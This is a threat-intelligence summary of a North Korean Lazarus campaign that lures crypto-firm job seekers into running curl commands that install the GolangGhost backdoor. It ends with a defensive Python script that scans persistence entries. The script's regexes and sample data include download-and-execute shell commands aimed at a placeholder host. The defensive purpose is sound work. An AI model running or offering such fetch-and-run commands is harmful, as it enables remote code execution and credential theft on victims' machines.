Full Report
The notorious North Korean Lazarus hacking group has reportedly adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi). [...]
Analysis Summary
# Threat Actor: Lazarus Group
## Attribution & Identity
Attributed to North Korean hackers. The article specifically details their adoption of the "ClickFix" attack concept, an evolution potentially related to prior "ClickFake" lure campaigns observed by Sekoia.
## Activity Summary
The actor has shifted the focus of its "ClickFake" and similar social engineering campaigns from developers and coders to non-technical personnel at Centralized Finance (CeFi) cryptocurrency firms, specifically business developers and marketing managers. The attack lures victims to a legitimate-looking remote interview site (built in ReactJS) that requests a video introduction. When the victim attempts to record, a fake error prompts them to run a `curl` command in Windows CMD or the macOS Terminal, which leads to malware infection.
## Tactics, Techniques & Procedures
- **Initial Access/Execution:** Social engineering via fake remote interview invitations leading to execution of commands.
- **Execution:** Running `curl` commands provided via malicious instructions on the landing page.
- **Persistence:** Establishing persistence via registry modification (Windows) and LaunchAgent plist files (macOS).
- **Defense Evasion/Discovery:** The C2 connection registers a unique machine ID.
- **Collection:** Stealing Chrome cookies, browsing history, and stored passwords.
- **Command and Control:** Establishing C2 communication after infection.
- **Credential Access:** Specifically targeting stored passwords in Chrome.
## Targeting
- **Sectors:** Cryptocurrency firms (CeFi companies).
- **Geography:** Not specified, but the instructions are OS-specific (Windows and macOS).
- **Victims:** Non-technical roles within crypto firms, such as business developers and marketing managers.
## Tools & Infrastructure
- **Malware families used:**
  - **GolangGhost:** A Go-based backdoor used as the primary implant.
- **Infrastructure (C2, domains, IPs - defang URLs):** Command and control (C2) servers are utilized for communication and receiving commands. (No specific defanged infrastructure details were provided in the excerpt).
## Implications
Lazarus Group is actively diversifying its infiltration methods to bypass traditional developer-focused defenses by targeting less technically savvy employees within high-value crypto firms. This suggests a continued, aggressive effort to achieve financial gain through cryptocurrency theft. The adoption of platform-native execution methods (`curl` in Terminal/CMD) blended with convincing social engineering poses a high risk.
## Mitigations
- **Never execute commands copied from the internet** in Windows Command Prompt or macOS Terminal, especially if the command's function is not fully understood.
- **Verify job/interview solicitations:** Exercise extreme caution with unsolicited interview invitations, especially those that require accessing external links or running local commands.
- **Utilize Threat Intelligence:** Deploy the provided YARA rules to detect and block ClickFake/GolangGhost activity.
- **System Hardening:** Ensure robust patching and monitoring for suspicious registry modifications and new LaunchAgent plist files.
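As an added illustration of the monitoring point above (not code from the article, Sekoia, or any published rule), the following Python audits the two persistence locations the report names, macOS LaunchAgent plists and Windows Run-key values, for command lines that fetch remote content and hand it to a shell. The heuristics, the sample plist and the Run-key values are constructed assumptions, not indicators from the campaign.

```python
"""Flag ClickFix-style persistence: LaunchAgent plists (macOS) and Run-key values
(Windows) whose command line fetches and executes remote code. Heuristics are assumptions."""
import plistlib
import re

SUSPICIOUS = {
    "remote_fetch": re.compile(r"\b(?:curl|wget|Invoke-WebRequest|iwr)\b.*https?://", re.I),
    "shell_dash_c": re.compile(r"\b(?:sh|bash|zsh|cmd(?:\.exe)?)\b\s+(?:-c|/c)\b", re.I),
    "pipe_to_shell": re.compile(r"\|\s*(?:sh|bash|zsh|iex)\b", re.I),
}

def score_command(cmdline: str) -> list:
    """Return the names of the heuristics a persistence command line matches."""
    return [name for name, pat in SUSPICIOUS.items() if pat.search(cmdline)]

def audit_launch_agent(plist_bytes: bytes) -> dict:
    """Parse a LaunchAgent plist and score its effective command line."""
    data = plistlib.loads(plist_bytes)
    args = [str(a) for a in data.get("ProgramArguments", [])]
    if "Program" in data:  # launchd honours Program as argv[0] when present
        args.insert(0, str(data["Program"]))
    cmdline = " ".join(args)
    return {"label": data.get("Label", "<no Label>"),
            "run_at_load": bool(data.get("RunAtLoad", False)),
            "findings": score_command(cmdline)}

def audit_run_values(values: dict) -> dict:
    """Score name->command pairs exported from a Run key; keep only hits."""
    return {name: f for name, cmd in values.items() if (f := score_command(cmd))}

# Constructed sample LaunchAgent shaped like a download-and-execute persistence entry.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updatehelper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -s http://placeholder.invalid/payload | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""
# Constructed Run-key export: one benign entry, one suspicious (placeholder host).
SAMPLE_RUN = {
    "OneDrive": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": r'cmd.exe /c curl -s http://placeholder.invalid/p.bat -o %TEMP%\p.bat & %TEMP%\p.bat',
}

if __name__ == "__main__":
    print(audit_launch_agent(SAMPLE_PLIST))
    print(audit_run_values(SAMPLE_RUN))
```

Point `audit_launch_agent` at the bytes of each file under `~/Library/LaunchAgents` and `audit_run_values` at a `reg query`/`Get-ItemProperty` export of the Run keys to apply the same checks to a live host.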